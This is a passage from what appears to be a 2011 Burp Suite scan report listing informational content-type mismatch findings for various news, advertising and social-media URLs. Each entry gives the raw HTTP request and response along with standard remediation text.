Expires: Sun, 04 Sep 2011 04:53:51 GMT
Date: Sun, 04 Sep 2011 04:20:27 GMT
Content-Length: 9
Connection: close

Not found

31.38. http://timesofindia.indiatimes.com/toitopics_comjs_v3.cms  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://timesofindia.indiatimes.com
Path:   /toitopics_comjs_v3.cms

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /toitopics_comjs_v3.cms HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.4.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _chartbeat2=8l1yir8xsllibs89; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Fri, 05 Aug 2011 01:53:47 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 58289
Expires: Sat, 04 Aug 2012 01:53:47 GMT
Date: Sun, 04 Sep 2011 02:33:49 GMT
Connection: close


                   function putMathQ(palace){
                       var f = Math.floor(Math.random()*10);
                       var s = Math.floor(Math.random()*6);    
                       var o = Math.floor(Math.random()*2);
                       //if(f<10){f=f+10}
                       var s
...[SNIP]...

31.39. http://twitterapi.indiatimes.com/feedtweet/tweet  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://twitterapi.indiatimes.com
Path:   /feedtweet/tweet

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /feedtweet/tweet HTTP/1.1
Host: twitterapi.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:20:14 GMT
Server: Apache/2.2.9 (Unix) DAV/2 mod_jk/1.2.25
Set-Cookie: JSESSIONID=788EEB6266D73155B2D8DB46D780C84A; Path=/feedtweet
Content-Length: 36
Connection: close
Content-Type: text/html


Please enter the story link

31.40. http://urls.api.twitter.com/1/urls/count.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://urls.api.twitter.com
Path:   /1/urls/count.json

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /1/urls/count.json HTTP/1.1
Host: urls.api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6599c6d212c5eb6e41d800b7f8bf7397:1284511129"
Last-Modified: Wed, 15 Sep 2010 00:38:49 GMT
Accept-Ranges: bytes
Content-Length: 95
Content-Type: text/plain
Date: Sun, 04 Sep 2011 04:22:14 GMT
Connection: close
X-N: S

twttr.receiveCount({"errors":[{"code":48,"message":"Unable to access URL counting services"}]})

31.41. http://web.adblade.com/clicks.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://web.adblade.com
Path:   /clicks.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /clicks.php HTTP/1.1
Host: web.adblade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-type: text/html
Connection: close
Date: Sun, 04 Sep 2011 04:23:07 GMT
Server: lighttpd/1.4.21
Content-Length: 20

Wrong Application Id

31.42. http://www.bangkokpost.com/_event.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bangkokpost.com
Path:   /_event.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /_event.php?xData=2011-09-04&xURI=/business/ HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; _cbclose62518=1; _uid62518=2BAEE501.1; verify=test; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:53:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Content-Length: 145
Content-Type: text/html; charset=utf-8

<li><strong>There is no local event on this day.</strong></li><li><a href="/calendar/step1/">Add or suggest local events to Bangkok Post</a></li>

31.43. http://www.bangkokpost.com/_getContent_main.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bangkokpost.com
Path:   /_getContent_main.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /_getContent_main.php?cate_path=,,5,,37,,&sortBy=lasted&orderBy=&limitPerPage=2&geography=Bangkok+%26+greater HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1; verify=test

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Content-Length: 1574
Content-Type: text/html; charset=utf-8

<ol class="rankVote">
<li>
<p class="figure"><a href="/travel/local-destinations/listing/the-house-of-dhamma/6255/" target="_blank" ><img title="The House of Dhamma" alt="The House of Dhamma" src="/p
...[SNIP]...

31.44. http://www.bangkokpost.com/common/js/extras_js.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bangkokpost.com
Path:   /common/js/extras_js.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /common/js/extras_js.php HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/telecom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; _cbclose62518=1; _uid62518=2BAEE501.1; verify=test; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1; visit_time=440

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 124
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug

function thai_datetime(){
var thai_datetime = 'Sunday September 4, 2011, 9:34 AM'; document.write(thai_datetime);
}

31.45. http://www.bangkokpost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bangkokpost.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: www.bangkokpost.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:26 GMT
Server: Apache/2.2.3 (Red Hat)
ETag: "2b1bee3-57e-ca0f2dc0"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=1296000, public, public
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ................................t6.h(..............s%....b.....r)..r4..........y.......z...............z4..v:..g...z7..d........Z ..P..~:......~=..wA...........T ..U5...
...[SNIP]...

31.46. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=731d4310e657b3903e3002a6432bca32&extern=0&channel=http%3A%2F%2Ftimesofindia.indiatimes.com%2Ftoifanapp.cms%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.122.61
X-Cnection: close
Date: Sun, 04 Sep 2011 02:27:14 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

31.47. http://www.google.com/buzz/api/button.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /buzz/api/button.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /buzz/api/button.js HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 200 OK
Expires: Sun, 04 Sep 2011 02:31:54 GMT
Date: Sun, 04 Sep 2011 02:26:54 GMT
Last-Modified: Wed, 17 Aug 2011 17:03:50 GMT
Content-Type: text/javascript; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 26686
Server: GSE
Age: 33
Cache-Control: public, max-age=300

if(!window.__google_buzz_loaded__){var google_buzz__base_url = 'http://www.google.com/buzz';
var google_buzz__img_url = 'http://www.gstatic.com/buzz/api/images';
var google_buzz__buzz_this_msgs={"ln":
...[SNIP]...

31.48. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain unrecognised content.

Request

GET /search?sclient=psy&hl=en&source=hp&q=mercury%20news&pbx=1&oq=&aq=&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037&pf=p&pdl=500&tch=1&ech=5&psi=a-FiTqPHAY7OiAL5_L2pCg.1315103121636.1 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:18 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: application/json; charset=UTF-8
Content-Disposition: attachment
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 92232

BfyINKgQ....S.......<.;...0.....m...{e:"juFiTuTWN8TKiAK9vJmXCg",c:1,u:"http://www.google.com/search?sclient\x3dpsy\x26hl\x3den\x26source\x3dhp\x26q\x3dmercury%20news\x26pbx\x3d1\x26oq\x3d\x26aq\x3d\x2
...[SNIP]...

31.49. http://www.ig.gmodules.com/gadgets/proxy/refresh=86400&container=ig&rewriteMime%3Dapplication%2Fx-shockwave-flash%26gadget%3Dhttp%3A%2F%2Fyowindow.com%2Fwimo%2Figoogle%2Fyowindow.xml/http://swf.yowindow.com/wimo/hpPal/landscapes/village/village.ywl  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ig.gmodules.com
Path:   /gadgets/proxy/refresh=86400&container=ig&rewriteMime%3Dapplication%2Fx-shockwave-flash%26gadget%3Dhttp%3A%2F%2Fyowindow.com%2Fwimo%2Figoogle%2Fyowindow.xml/http://swf.yowindow.com/wimo/hpPal/landscapes/village/village.ywl

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain XML.

Request

GET /gadgets/proxy/refresh=86400&container=ig&rewriteMime%3Dapplication%2Fx-shockwave-flash%26gadget%3Dhttp%3A%2F%2Fyowindow.com%2Fwimo%2Figoogle%2Fyowindow.xml/http://swf.yowindow.com/wimo/hpPal/landscapes/village/village.ywl?noCache=225 HTTP/1.1
Host: www.ig.gmodules.com
Proxy-Connection: keep-alive
Referer: http://swf.yowindow.com/wimo/hpPal/hpPal.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=86400
Content-Disposition: attachment;filename=p.txt
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 02:32:04 GMT
Expires: Mon, 05 Sep 2011 02:32:04 GMT
Via: HTTP/1.1 GWA
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 119
Server: GSE

<landscape name="Village" type="plugin" id="com.yowindow.village">
   <data src="swf/village.swf">
   </data>
</landscape>

31.50. http://www.nationmultimedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nationmultimedia.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: www.nationmultimedia.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:09 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 10 Feb 2009 04:20:41 GMT
ETag: "617247-37e-cf5e9840"
Accept-Ranges: bytes
_ontent-Length: 894
_onnection: close
Content-Type: text/plain; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 894

..............h.......(....... ......................................................................................GHm$'t25.ln..................z:=..................t15......................XZl%'...
...[SNIP]...

31.51. http://www.nationmultimedia.com/home/banner/ad_set1.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nationmultimedia.com
Path:   /home/banner/ad_set1.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /home/banner/ad_set1.html HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose=1; _cbclose32539=1; _uid32539=8467E527.1; _ctout32539=1; verify=test; _em_vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; _em_v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180; _em_hl=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:55 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 31 May 2011 09:38:31 GMT
ETag: "1b2b289-c43-2abab3c0"
Accept-Ranges: bytes
_ontent-Length: 3139
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 3139

<script type='text/javascript'>
<!--
var OA_zones = {'Nationmultimedia1431' :1431,'Nationmultimedia1432' :1432,'Nationmultimedia1433' :1433,'Nationmultimedia1434' :1434}
--></script>
<script ty
...[SNIP]...

31.52. http://www.nationmultimedia.com/home/banner/weather.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nationmultimedia.com
Path:   /home/banner/weather.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /home/banner/weather.html HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose=1; _cbclose32539=1; _uid32539=8467E527.1; _ctout32539=1; verify=test; _em_vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; _em_v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180; _em_hl=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:26:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 25 Mar 2010 05:28:57 GMT
ETag: "a0c6dc-281-52c39840"
Accept-Ranges: bytes
_ontent-Length: 641
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 641

<object type="application/x-shockwave-flash" data="http://swf.yowindow.com/wimo/hpPal/hpPal.swf" width="380" height="194">
   <param name="movie" value="http://swf.yowindow.com/wimo/hpPal/hpPal.swf"/>
...[SNIP]...

31.53. http://www.ndtv.com/news/utils/new_ajax_gateway.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ndtv.com
Path:   /news/utils/new_ajax_gateway.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /news/utils/new_ajax_gateway.php HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=58
Expires: Sun, 04 Sep 2011 04:44:06 GMT
Date: Sun, 04 Sep 2011 04:43:08 GMT
Content-Length: 18
Connection: close

Content not found.

31.54. http://www.scb.co.th/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.scb.co.th
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=1ctsnmk0q15mlinku02lk986e6

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:31:19 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 11:50:00 GMT
Accept-Ranges: bytes
Content-Length: 2238
Cache-Control: public
Expires: Tue, 04 Oct 2011 03:31:19 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

...... ..............(... ...@................................,s..P..}.V.z.Y.t
`.t
a.y.Z.T4...|..........O<..X.......Q8..y.Y.O;..............LA..V2......JB..`$z........Y-..b"y.....!x..%s............
...[SNIP]...

31.55. http://www.tribalfusion.com/test/opt.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tribalfusion.com
Path:   /test/opt.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /test/opt.js HTTP/1.1
Host: www.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=acntIZdr2PKyruYnRY671MyFfmhZdHpni7AU5HqolbGMnoAh1myLwtwKZalWJyuDgb1kXyPrXjePLDOBMZdEl4XqZbFjGfn9fmebZd

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: no-store
Content-Type: text/html
Content-Length: 25
Date: Sun, 04 Sep 2011 10:59:00 GMT

var TFID='';
OPT_DO();

31.56. http://www9.effectivemeasure.net/v4/em_js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v4/em_js?flag=0&v=&vt=&hl=&sv=0&pv=&pn=&p=aHR0cDovL3d3dy5uYXRpb25tdWx0aW1lZGlhLmNvbS8%3D&r=aHR0cDovL3d3dy5nb29nbGUuY29tL3NlYXJjaD9zb3VyY2VpZD1jaHJvbWUmaWU9VVRGLTgmcT1iYW5na29rK3RoYWlsYW5kK25ld3M%3D&f=1&ns=_em&rnd=0.828509088139981&u=cat2_id%3D541.552057%26&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: vt=cff6b95a3706f313acc9b9e202024e62e18088e413-981323754e62e181; expires=Wed, 29-Aug-2012 02:25:05 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: v=5fe7a94f70408cf438e50d7277324e62e18088e4f8-084548474e62e181135_458; expires=Sun, 04-Sep-2011 02:55:05 GMT; path=/; domain=.effectivemeasure.net
Content-type: text/javascript
Connection: close
Content-Length: 369
Date: Sun, 04 Sep 2011 02:25:05 GMT
Server: C10

_em._domain="nationmultimedia.com";_em.setCkVt("cff6b95a3706f313acc9b9e202024e62e18088e413-981323754e62e181");_em.setCkV("5fe7a94f70408cf438e50d7277324e62e18088e4f8-084548474e62e181");_em.setCkSv("-1"
...[SNIP]...

32. Content type is not specified  previous
There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


32.1. http://ads.bluelithium.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
